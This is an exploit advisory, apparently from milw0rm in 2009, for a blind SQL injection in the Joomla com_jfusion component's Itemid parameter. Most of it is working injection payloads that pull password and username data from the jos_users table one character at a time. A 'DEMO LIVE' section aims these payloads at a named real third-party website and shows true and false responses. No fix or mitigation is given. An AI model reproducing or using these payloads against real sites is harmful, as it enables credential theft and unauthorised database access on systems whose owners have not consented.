++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++
Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++
################################################## #
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : Blind SQL injection
################################################## #
Example:
Код:
http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code] n:valid Itemid
Sql code:
Код:
+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
etc, etc...
DEMO LIVE:
Код:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1
Код:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97 !False ¡¡¡¡
Код:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98 ¡True ¡¡¡¡
etc, etc...
# milw0rm.com [2009-08-01]